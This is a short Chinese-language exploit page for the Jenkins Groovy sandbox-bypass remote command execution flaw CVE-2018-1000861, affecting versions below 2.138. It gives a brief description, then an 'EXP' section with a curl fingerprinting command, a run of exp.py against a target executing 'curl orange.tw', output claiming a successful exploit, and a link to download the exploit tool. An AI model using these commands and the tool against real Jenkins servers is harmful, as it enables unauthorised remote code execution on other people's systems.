Jenkins 远程命令执行漏洞(CVE-2018-1000861)

## 漏洞概述

Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。

## 影响范围

“`http
Jenkins version < 2.138 ``` ## EXP ```bash $ curl -s -I http://jenkins/| grep X-Jenkins X-Jenkins: 2.137 X-Jenkins-Session: 20f72c2e X-Jenkins-CLI-Port: 50000 X-Jenkins-CLI2-Port: 50000 $ python exp.py http://jenkins/ 'curl orange.tw' [*] ANONYMOUS_READ disable! [*] Bypass with CVE-2018-1000861! [*] Exploit success!(it should be :P) ``` [点我下载 exp](/Gr33kLibrary/download_tool/73/)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容